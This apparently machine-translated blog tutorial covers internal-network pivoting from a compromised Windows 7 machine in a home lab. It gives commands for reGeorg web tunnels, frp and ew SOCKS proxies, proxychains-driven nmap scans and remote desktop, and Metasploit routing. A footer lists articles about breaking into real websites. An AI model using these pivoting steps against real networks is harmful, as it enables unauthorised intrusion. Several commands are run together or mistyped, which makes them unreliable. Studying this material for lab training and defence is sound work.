Regardless of regret (what is the role of intranet penetration), what is the role and function of intranet penetration? Intranet penetration | This article lets you skillfully use intranet penetration (detailed steps),

0x00 Preface Intranet penetration has always been the focus of post-penetration. There are many articles in this field on the Internet. After absorbing and summarizing, it took 2 days to organize a tool application of intranet penetration, and strive to use the most concise steps to skillfully use intranet penetration. Here, the four commonly used methods are selected: reGeorge.

, frp, ew, msf+proxychains (sufficient for different intranet environments), in which frp and ew have done experiments in Linux and Win respectively. Related software download: link: https://pan.baidu.com/s/1DvEI0mLEKnwrd3EMUsH1DA

Extraction code: The 33t6 experimental environment two-layer network environment can be built by oneself, or the official account can reply to the “intranet penetration environment” to obtain two download link attackers (kali and win10): 192.168.211.164 (VMnet8NAT mode), 192.168

. 211.193 (VMnet8NAT mode) 1 springboard machine (win7): external network 192.168.211.224 (VMnet8NAT mode), internal network 192.168.52.143 (VMnet1 host-only mode) 2 internal network machines:

The simple network topology of 192.168.52.138 (VMnet1 host-only mode) and 192.168.52.141 (VMnet1 host-only mode) is as follows:

0x01 reGeorge 1.1 environment attack machine kalireGeorge software, download: https://github.com/sensepost/reGeorg Environment required for running sequence pair: Python, pip, urllib3

； Pip installation: wget https://bootstrap.pypa.io/get-pip.pypython Get-pip.py depends on urllib3 installation: pip install urllib31.2 deployment configuration

The prerequisite for uploading tunnel.nosucket.php is that the permission of the springboard machine has been obtained (all have been connected to the intranet, and the permission of the springboard machine must have been obtained). The springboard machine of the Windows7 system is a php environment

Upload to the website and visit http://192.168.211.224/tunnel.nosocket.php Access succeeded

Start reGeorgpython reGeorgSocksProxy.py – p 1080- uhttp://192.168.211.224/tunnel.nosocket.php #Indicates that the traffic of the local 1080 port is forwarded to the specified one

Url, 1080 is the specified listening port;

Configure the proxy and then configure the proxychains proxy chain configuration file/etc/proxychains. conf, and set the proxy to the 1080 port of this machine: socks5 127.0.0.1 1080

1.3 The test command is preceded by the proxychains run command, (the PHP environment of the springboard machine has been started, and the home page index. php exists) proxychains curl http://192.168.52.143

ReGeorge control terminal

Proof of successful reverse proxy connection 0x02 frp software: frp_ 0.33.0_ windows_ amd64 ，frp_ 0.34.1_ linux_ Amd64 proxy tool Proximitor

, SocksCap64, Linux set in proxychains) 2.1 The attack machine is the windows environment frp reverse proxy: attack machine – server: set frps.ini [common] bind_ Port=7000 and then run

frps.exe-cfrps.ini

Springboard machine – client: set frpc.ini [common] server_ addr = 192.168.211.193server_ port = 7000[http_proxy] type = tcp remote_ port =

8010plugin=socks5 and then run frpc.exe-cfrpc.ini

The server runs the proxier to listen to port 8010:

Click to check

The test in the Proximitor is successful. Browser access 192.168.52.143 Access succeeded

Test the remote connection 192.168.52.143 and 141 (the remote connection of these two machines has been opened)

Frp forward proxy: the attacker is the client frpc.ini [common] server_ addr = 192.168.211.224server_ port = 7000 [http_proxy] type = tcp

remote_ Port=8010 plugin=socks5 Execute the frpc.e-cfrpc.ini springboard machine as the server-side [common] bind_ Port=7000 Execute frps.exe-cfrps.ini

Run the proxier on the attacker – client, add the server address 192.168.211.214, port 8010, and connect

I don’t know why. Connecting to the internal network of the springboard machine 192.168.52.143 failed. Connecting to the external network card of the springboard 192.168.211.214 succeeded. A large number of frp forward proxies were also searched on the Internet. It seems that there are not many frp forward proxies. After the launch, frp still insists on using reverse proxies.

2.2 The attack machine is the frp reverse proxy server in the kali environment – attack machine: frps.ini configuration content [common] bind_ Port=7000 Execute the command/ frps -c frps.ini

Client – springboard machine: frpc.ini configuration content [common] server_ addr = 192.168.211.193 server_ port = 7000 [http_proxy] type = tcp

#remote_ port = 8010 remote_ Port=1080 plugin=socks5 Execute the command frpc.exe-cfrpc.ini

Configure the proxychains proxy chain configuration file/etc/proxychains. conf, and set the proxy to the 1080 port of this machine (modified by the root user): socks4 127.0.0.1 1080

Then add proxychains before the command. Test: proxychains curl http://192.168.52.143

Proxychains rdesktop 192.168.52.141 (remote connection to intranet computer desktop) proves that the proxy successfully executed nmapproxychainsnap-p 1-1000-Pn-sT192.168.52.141

Scan the surviving machine and port of the C end roxychains nmap – p 1-65525 – Pn – st192.168.52.02/24. Summarize the advantages and disadvantages of frp: using reverse proxy, you only need to forward the intranet host and port to be accessed, which is faster

Disadvantages: The configuration is relatively complex when accessing the https website 0x03 ew3.1 The attacker is the ew forward agent in the windos10 environment. 1. The forward connection springboard machine executes on the win7 machine (ew_for_windows uploads to the springboard machine) ew_ for_ Win

. exe-sssocksd-l 888 attacker – listen to the local 888 port. Then connect the proxier on the win10 machine

Test http: access http://192.168.52.143/ success

Test remote desktop: 192.168.52.141 succeeded

Ew Reverse proxy attack machine executes ew_ for_ Win.exe-srcsocks-l 1080 – e 1234 forwards the external 1234 port to the 1080 port, – l listens to the local port, and then connects this port as the socks5 port – e

Rebound the transit port and connect the edge machine with ew_ for_ Win.exe-srssocks-d192.168.211.164-e 1234-d specifies the rebound host. Here, specify the rebound transfer port and vps for the ip-e of the public vps

The settings in

Test http: access http://192.168.52.143/ success

Test remote desktop: 192.168.52.141 succeeded

3.2 The attack machine environment is Kaliw reverse proxy server – the attack machine Kali executes:/ ew_ for_ linux64 -s rcsocks -l 1080 -e 1024

Client – springboard machine executes ew_ for_ Win.exe-srssocks-d192.168.211.193-e 1024 Configure proxychains The proxy chain is set in the configuration file/etc/proxychains.conf

Port 1080 (modified by root user):

Test execution: execution curlhttp://192.168.211.219/index.php Prove that the network is connected

Execute proxychainscurl http://192.168.52.143/index.php

Verify that the agent successfully connected successfully. Execute nampproxychainsnmap-p 1-1000-Pn-sT192.168.52.141

Ew Forward proxy server side – springboard machine execution command: ew_ for_ Win.exe-sssocksd-l 1080 client-attack machine kali configures the proxychains proxy chain in the configuration file/etc/proxychains.conf

, set the proxy to the server’s IP address and port 1080 (modified by the root user):

Test execution: execute proxychains curl http://192.168.211.219/index.php Prove that the agent is successful

The following steps are to test the application of nmap under proxy conditions. Execute nmap to scan the intranet survival host proxychains map – PS 192.168.211.1/24 Note: the scan will be fast under normal agentless conditions

Slow scanning after joining the agent

No ping scan proxychains nmap – p0 192.168.52/24 Scan the open port proxychains nmap – p 1-1000-Pn-sT192.168.52.141 Summary of advantages and disadvantages

Advantages: simple configuration, equivalent to being directly in the target intranet Disadvantages: slow speed, unstable 0x04 msf+proxychainsmsf to obtain the access of the springboard machine (how to obtain the access is not described here, using the msf built-in module attack), (1) The purpose of adding the intranet route is to allow

Other MSF modules can access other hosts in the intranet, that is, the attack traffic of the 52 network segment is transmitted through the meterpreter session of the penetrated target host; (Note: add a route before suspending the agent, because the agent needs to use the routing function)

Use arp – a to view the current ARP cache of all interfaces

(2) Add socks agent. The purpose of adding socks4a agent is to make other software more convenient to access the services of other hosts in the intranet; After setting successfully, when opening other programs, proxychains should be added to the front through the method of reGeorge+socks4 (see this article for details

00×1) Add agent

Prove the success of the agent Recommended reading: Infiltration practical combat series ▶ [Infiltration Practice Series] 18 – Get tens of thousands of people’s information from the school site manually (vulnerabilities have been submitted) ▶ [Infiltration Practice Series] | 17 – Get the shell of the target website by skillfully using fofa ▶ [Penetration Practice Series] | 16 – Naked Chat APP penetration test

▶ [Penetration Practice Series] | 15 – Common entry points for penetration of gaming websites (APP) ▶ [Infiltration Practical Series] | 14 – Penetration Test of Fraud (Hog-killing) Website ▶ [Infiltration Practice Series] | 13-waf bypass and win gambling websites ▶ [Infiltration Practice Series] | 12 – Infiltration Practice, the fraud behind being cheated of 4000 flowers

▶ [Infiltration Real Battle Series] | 11 – Everyone in the gambling station should be punished ▶ [Infiltration Practical Series] | 10 – Record the white whoring of a certain X Mall payment logic flaw (modify the price and submit the order) ▶ [Infiltration Practice Series] | 9 – A web penetration practice test conducted on overseas websites (very detailed, suitable for combat training)

▶ [Penetration Practice Series] | 8 – Record a penetration test process from XSS to Getshell (detailed to speechless) ▶ [Infiltration Practical Series] | 7 – Record a penetration test case of financial management piggy dish ▶ [Infiltration Practice Series] | 6 – BC Hog-killing Plate Infiltration Process (links to other articles in [Infiltration Practice Series] are attached at the end of the article)

▶ [Penetration Practice Series] | 5 – Record a penetration test of underwear website ▶ [Infiltration Practice Series] | 4 – How do I take down the server of BC station ▶ [Penetration Practice Series] | 3 – A simple penetration ▶ [Infiltration Real War Series] | 2 – Record a real war case from back door blasting to power raising ▶ [Infiltration Practice Series] | 1 A penetration practice of cross-border gambling APP (get shell and get all data)

Long press – identify – follow

Hacking black, white and red is a learning platform focusing on information security technology

Point sharing

Point Collection

Like a little

Point to see